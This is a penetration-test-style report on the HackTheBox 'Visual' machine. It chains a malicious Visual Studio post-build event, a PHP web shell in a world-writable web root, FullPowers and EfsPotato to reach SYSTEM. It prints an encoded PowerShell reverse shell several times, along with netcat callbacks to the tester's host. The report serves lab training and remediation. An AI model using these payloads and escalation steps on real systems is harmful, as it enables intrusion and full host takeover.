Visual - Pentest Report
Executive Summary
HackTheBox contracted Otrashoui Cybersecurity Services™ to perform a Network Penetration Test of one of Hack The Box’s internal hosts to identify security weaknesses, determine the impact to HackTheBox, and provide remediation recommendations.
Approach
Otrashoui Cybersecurity Services™ performed testing under a “black box” approach without credentials or any prior knowledge of HackTheBox’s environment.
Scope
| Host | Description |
|---|---|
| 10.10.11.234 | Visual Web Server |
Assessment Overview and Recommendations
During the Penetration test against HackTheBox, Otrashoui Cybersecurity Services™ identified two (2) findings that affect HackTheBox’s information security posture.
The first finding involved a Remote Code Execution triggered when the web application builds the user-provided Visual Studio project. This results in access to the local system, allowing an attacker to view potentially sensitive data. This vulnerability can be fixed by hardening the web application and build pipeline, for example by ignoring build events.
The second finding involved insecure file permissions on the web server folder. These permissions allow any user on the system to view, modify and remove any files or folders of the web application. This can be used by attackers to modify the web application to include malicious functionality, or cause a outage. Permissions on sensitive locations on the system should be reviewed and hardened, to only allow access to trusted and necessary users.
Summary of Findings
The following table presents a summary of findings by severity level:
| High | Medium | Low | Total |
|---|---|---|---|
| 2 | 0 | 0 | 2 |
Below is a high-level overview of each finding identified during the assessment. These findings are covered in depth in the Technical Findings Details section of this report:
| Name | Severity |
|---|---|
| Remote Code Execution via Visual Studio Project | High |
| Insecure File Permissions | High |
Exploitation Walkthrough
During the course of the assessment, Otrashoui Cybersecurity Services™ was able to gain a foothold and compromise the in-scope host. The steps below demonstrate how the tester went from unauthenticated user to administrative access on the host.
Detailed Walkthrough
- The tester was able to get remote code execution by create a git repository containing a malicious Visual Studio project using post-build events.
- The tester found that the web root
C:\xampp\htdocshas permissions allowing any user to add/remove/modify files. - By placing a PHP file in the web root, it was possible to execute commands as the
NT AUTHORITY\LOCAL SERVICEuser. - This service account had most of its original privileges disabled, but using a technique involving creating a scheduled task, it was possible to recover them, including the dangerous
SeImpersonatePrivilege. - This privilege allowed the tester to achieve full administrative access by using one variation of the potato exploits (EfsPotato).
Reproduction Steps
In the following code snippets, [...] is used to discard irrelevant output in the current context. Additionally, lines starting with the $ character indicate a system command typed by the tester.
- Create .NET 6.0 Visual Studio project -> “Console Application” template
- In “Solution Explorer” (side panel at the right) -> right click on project name -> Properties
- Go to “Build” -> “Events” -> put reverse shell payload in “Post-build event”
- Change “When to run the post-build event” to “Always”
Here is the reverse shell payload:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=Initialize a git repository inside the project folder and run git update-server-info to make it clone-able:
$ git init
Initialized empty Git repository in /tmp/Visual-RCE/.git/
$ git update-server-infoInside the project folder, serve the .git directory using python’s built-in http.server module:
$ sudo python3 -m http.server -d .git 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Some time after submitting the URL to the git repository, the reverse shell is received:
$ rlwrap nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.119.24:49708.
PS C:\Windows\Temp\11ac1e51470a88ca33c158f79e5699>PS C:\xampp> icacls C:\xampp\htdocs
C:\xampp\htdocs Everyone:(OI)(CI)(F)
Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 filesIt is possible to obtain a reverse shell as the NT AUTHORITY\LOCAL SERVICE user by placing a PHP file in the web root containing the same payload as above:
<?php system("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="); ?>This user only has a few privileges:
PS C:\programdata> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledAccording to Microsoft’s documentation, this account should have more privileges, including the powerful SeImpersonate.
We can use a technique described in this blog post to get those privileges back. It involves creating a scheduled task as the NT AUTHORITY\LOCAL SERVICE user, which will run with the normal set of privileges. The blog author created a tool to facilitate this process:
PS C:\programdata> .\FullPowers.exe -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='The payload is once again the same base64 encoded PowerShell reverse shell.
After executing the command, the reverse shell is received, and the privileges are present:
$ nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.119.24:49740.
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWith the SeImpersonatePrivilege, it is possible to escalate to NT AUTHORITY\SYSTEM using one of the Potato exploits.
The tester used EFS Potato, from this Github repository. There is no compiled binary available, so it is necessary to clone the repository on a Windows system and build it manually.
After doing so, transfer the executable to the target system and run it:
C:\ProgramData>efs.exe -p "C:\ProgramData\nc.exe" -a "10.10.14.95 443 -e cmd"
efs.exe -p "C:\ProgramData\nc.exe" -a "10.10.14.95 443 -e cmd"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c0618fef-c0f3-430f-a4e5-57c10429497f/\c0618fef-c0f3-430f-a4e5-57c10429497f\c0618fef-c0f3-430f-a4e5-57c10429497f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!For some reason, the PowerShell reverse shell paylaod didn’t work, so the tester uploaded nc.exe to establish the reverse shell instead.
Shortly after executing the command above, the reverse shell as NT AUTHORITY\SYSTEM is catched:
Microsoft Windows [Version 10.0.17763.4840]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
VISUALRemediation Summary
Short Term
- Disable pre and post-build events in Visual Studio.
- Harden the file permissions of important locations on the system, by restricting the access to trusted users only.
Medium Term
- Implement a stricter access control policy
Long Term
- Perform regular security assessments
Technical Findings Details
1. Remote Code Execution via Visual Studio Project - High
| CWE | 892 |
|---|---|
| CVSS 3.1 Score | 9.8 |
| Affected Host | 10.10.11.234 |
| Description | It is possible to execute arbitrary code on the server by creating a git repository containing a malicious Visual Studio project. |
| Impact | The remote code execution gives attackers access to the local filesystem, as well as the internal network, giving them more opportunities to further compromise the enterprise. |
| Remediation | Disable pre and post-build events. |
| External References | https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022 |
Evidence
- Create .NET 6.0 Visual Studio project -> “Console Application” template
- In “Solution Explorer” (side panel at the right) -> right click on project name -> Properties
- Go to “Build” -> “Events” -> put commands in “Post-build event”
- Change “When to run the post-build event” to “Always”
Initialize a git repository inside the project folder and run git update-server-info to make it clone-able:
$ git init
Initialized empty Git repository in /tmp/Visual-RCE/.git/
$ git update-server-infoInside the project folder, serve the .git directory using python’s built-in http.server module:
$ sudo python3 -m http.server -d .git 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Submit the URL to the malicious git repository to the web application. After some time, the post-build event gets executed and the request from curl.exe is received:
[...]
10.129.131.221 - - [01/Oct/2023 00:52:51] "GET /ITWORKS HTTP/1.1" 404 -It is possible to modify the post-build event to obtain a reverse shell to get remote access to the underlying server.
2. Insecure File Permissions - High
| CWE | 732 |
|---|---|
| CVSS 3.1 Score | 8.0 |
| Affected Host | 10.10.11.234 |
| Description | File permissions on the C:\xampp\htdocs web root folder allow any user to add, modify or remove files and folders. |
| Impact | An attacker can use these permissions to gain access to a sensitive service account, bring the service down, add malicious functionality targeting the users of the application, or retrieve sensitive data. |
| Remediation | Harden the file permissions of important locations on the system, by restricting the access to trusted users only. |
| External References | https://ss64.com/nt/icacls.html |
Evidence
Inspect file permissions using the icalcs Windows utility:
PS C:\xampp> icacls C:\xampp\htdocs
C:\xampp\htdocs Everyone:(OI)(CI)(F)
Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 filesEveryone has Full Control (F) on C:\xampp\htdocs.
Create a simple PHP script to execute system commands:
<?php system("whoami /all"); ?>Note that the PHP script has to be created on a Linux or MacOS system, as files in the default Windows encoding (UTF-16LE) won’t get executed by Apache.
After transferring the file to the target system and placing it in the web root (C:\xampp\htdocs), it is possible to execute commands as the NT AUTHORITY\LOCAL SERVICE user: 